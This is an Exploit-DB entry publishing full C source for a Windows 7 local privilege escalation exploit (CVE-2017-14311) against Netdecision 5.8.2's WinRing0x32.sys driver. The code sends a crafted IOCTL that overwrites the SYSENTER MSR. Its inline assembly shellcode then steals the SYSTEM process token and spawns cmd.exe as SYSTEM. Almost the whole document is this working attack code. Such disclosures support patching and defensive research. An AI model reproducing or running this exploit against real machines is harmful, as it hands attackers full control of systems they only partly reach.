Netdecision 5.8.2 - Local Privilege Escalation

EDB-ID: 42735
Author: Peter Baris
Published: 2017-09-16
CVE: CVE-2017-14311
Type: Local
Platform: Windows
Vulnerable App: N/A

 /* 
# Exploit Title: Netdecision 5.8.2 - Local Privilege Escalation - Winring0x32.sys
# Date: 2017.09.17
# Exploit Author: Peter Baris
# Vendor Homepage: www.netmechanica.com
# Software Link: http://www.netmechanica.com/downloads/ //registration required
# Version: 5.8.2
# Tested on: Windows 7 Pro SP1 x86 / Windows 7 Enterprise SP1
# CVE : CVE-2017-14311

Vendor notified on 2017.09.11 - no response */

#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>
#include <tlhelp32.h>
#include <Psapi.h>

#define DEVICE_NAME L"\\\\.\\WinRing0_1_2_0"



LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
HANDLE GetDeviceHandle(LPCTSTR FileName) {
HANDLE hFile = NULL;

hFile = CreateFile(FileName,
GENERIC_READ | GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
NULL,
0);

return hFile;
}


extern ULONG ZwYieldExecution = NULL;
extern PVOID KernelBaseAddressInKernelMode = NULL;
extern HMODULE hKernelInUserMode = NULL;

VOID GetKiFastSystemCall() {

SIZE_T ReturnLength;
HMODULE hntdll = NULL;

ULONG ZwYieldExecution_offset;


hntdll = LoadLibraryA("ntdll.dll");

if (!hntdll) {
printf("[-] Failed to Load ntdll.dll: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}

LPVOID drivers[1024];
DWORD cbNeeded;

EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
KernelBaseAddressInKernelMode = drivers[0];


printf("[+] Kernel base address: 0x%X\n", KernelBaseAddressInKernelMode);

hKernelInUserMode = LoadLibraryA("ntkrnlpa.exe");

if (!hKernelInUserMode) {
printf("[-] Failed to load kernel: 0x%X\n", GetLastError());
exit;
}


printf("[+] KernelImage Base in User-Mode 0x%X\r\n", hKernelInUserMode);




ZwYieldExecution = GetProcAddress(hKernelInUserMode, "ZwYieldExecution");

if (!ZwYieldExecution) {
printf("[-] Failed to resolve KiFastSystemCall: 0x%X\n", GetLastError());
exit;
}

ZwYieldExecution_offset = (ULONG)ZwYieldExecution - (ULONG)hKernelInUserMode;
printf("[+] ZwYieldExecution's offset address in ntkrnlpa.exe: 0x%X\n", ZwYieldExecution_offset);


(ULONG)ZwYieldExecution = (ULONG)ZwYieldExecution_offset + (ULONG)KernelBaseAddressInKernelMode;

printf("[+] ZwYieldExecution's address in kernel-mode: 0x%X\n", ZwYieldExecution);


if (hntdll) {
FreeLibrary(hntdll);
}

if (hKernelInUserMode) {
FreeLibrary(hKernelInUserMode);
}

hntdll = NULL;

return hKernelInUserMode;
return ZwYieldExecution;
}


extern ULONG eip = NULL;
extern ULONG pesp = NULL;
extern ULONG pebp = NULL;
extern ULONG ETHREAD = NULL;

ULONG Shellcode() {

ULONG FunctionAddress = ZwYieldExecution;

__asm {

pushad
pushfd
xor eax,eax

mov edi, FunctionAddress ; Address of ZwYieldExection to EDI

SearchCall:
mov eax, 0xe8
scasb
jnz SearchCall

mov ebx, edi
mov ecx, [edi]
add ebx, ecx; EBX points to KiSystemService
add ebx, 0x4

lea edi, [ebx - 0x1]
SearchFastCallEntry:
mov eax, 0x00000023
scasd
jnz SearchFastCallEntry
mov eax, 0xa10f306a
scasd
jnz SearchFastCallEntry

lea eax,[edi-0x9]
xor edx, edx
mov ecx, 0x176


wrmsr
popfd
popad


mov eax,ETHREAD

mov eax,[eax]
mov eax, [eax+0x050]
mov ecx, eax
mov edx, 0x4

FindSystemProcess :
mov eax, [eax + 0x0B8]
sub eax, 0x0B8
cmp[eax + 0x0B4], edx
jne FindSystemProcess


mov edx, [eax + 0x0F8]
mov[ecx + 0x0F8], edx

;xor eax, eax
mov esp,pesp
mov ebp,pebp

push eip
; int 3
ret

}

}



int main()
{
HANDLE hlib = NULL;
HANDLE hFile = NULL;
PVOID lpInBuffer = NULL;
ULONG lpOutBuffer = NULL;
ULONG lpBytesReturned;
PVOID BuffAddress = NULL;
SIZE_T BufferSize = 0x1000;
SIZE_T nOutBufferSize = 0x800;
ULONG Interval = 0;
ULONG Shell = &Shellcode;
NTSTATUS NtStatus = NULL;



/* Undocumented feature to trigger the vulnerability */
hlib = LoadLibraryA("ntdll.dll");

if (!hlib) {
printf("[-] Failed to load the library: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}


GetKiFastSystemCall();

/* Allocate memory for our input and output buffers */
lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

/*Getting KiFastSystemCall address from ntdll.dll to restore it in 0x176 MSR*/


lpOutBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
//printf("[+] Address to write our shellcode's address to: 0x%X\r\n", lpOutBuffer);


/* Crafting the input buffer */

BuffAddress = (PVOID)(((ULONG)lpInBuffer));
*(PULONG)BuffAddress = (ULONG)0x00000176; /*IA32_SYSENTER_EIP MSR*/
BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x4));
*(PULONG)BuffAddress = (ULONG)Shell; /*Our assembly shellcode Pointer into EAX*/
BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0x8));
*(PULONG)BuffAddress = (ULONG)0x00000000; /* EDX is 0x00000000 in 32bit mode */
BuffAddress = (PVOID)(((ULONG)lpInBuffer + 0xc));
*(PULONG)BuffAddress = (ULONG)0x00000000;


//RtlFillMemory(lpInBuffer, BufferSize, 0x41);
//RtlFillMemory(lpOutBuffer, BufferSize, 0x42);


//printf("[+] Trying the get the handle for the WinRing0_1_2_0 device.\r\n");

hFile = GetDeviceHandle(FileName);

if (hFile == INVALID_HANDLE_VALUE) {
printf("[-] Can't get the device handle. 0x%X\r\n", GetLastError());
return 1;
}
else
{
printf("[+] Handle opened for WinRing0x32. Sending IOCTL.\r\n");
}

/*Here we calculate the EIP for our return from kernel-mode. This exploit does not let us simply adjust the stack and return*/

(HANDLE)eip = GetModuleHandleA(NULL); /*Getting the base address of our process*/
printf("[+] Current process base address 0x%X\r\n", (HANDLE)eip);
(HANDLE)eip = eip + 0x13ae; /*Any time you change something in the main() section you MUST adjust the offset to point to the PUSH 40 instrction*/
printf("[+] Return address (EIP) from kernel-mode 0x%X\r\n", (HANDLE)eip);

/*Setting CPU affinity before execution to maximize the chance of executing our code on the same CPU core*/
DWORD_PTR i = 1; /*CPU Core with ID 1 will be always chosen for the execution*/

ULONG affinity = SetThreadAffinityMask(GetCurrentThread(), i);

printf("[+] Setting affinity for logical CPU with ID:%d\r\n", i);
if (affinity == NULL) {

printf("[-] Something went wrong while setting CPU affinity 0x%X\r\n", GetLastError());
exit(1);
}

ETHREAD = (ULONG)KernelBaseAddressInKernelMode + 0x12bd24; /*Offset to nt!KiInitialThread as TEB is not readable*/

/*Saving stack pointer and stack frame of user-mode before diving in kernel-mode to restore it before returning to user-mode */

__asm {

mov pesp, esp
mov pebp, ebp
nop
}


DeviceIoControl(hFile,
0x9C402088,
lpInBuffer,
0x10,
lpOutBuffer,
0x20,
&lpBytesReturned,
NULL);



STARTUPINFO info = { sizeof(info) };
PROCESS_INFORMATION processInfo;
NTSTATUS proc;
LPCSTR command = L"C:\\Windows\\System32\\cmd.exe";
proc = CreateProcess(command, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &info, &processInfo);

if (!proc) {

printf("ERROR 0x%X\r\n", proc);
}
WaitForSingleObject(processInfo.hProcess, INFINITE);


exit(0);
}

Related Posts

Comments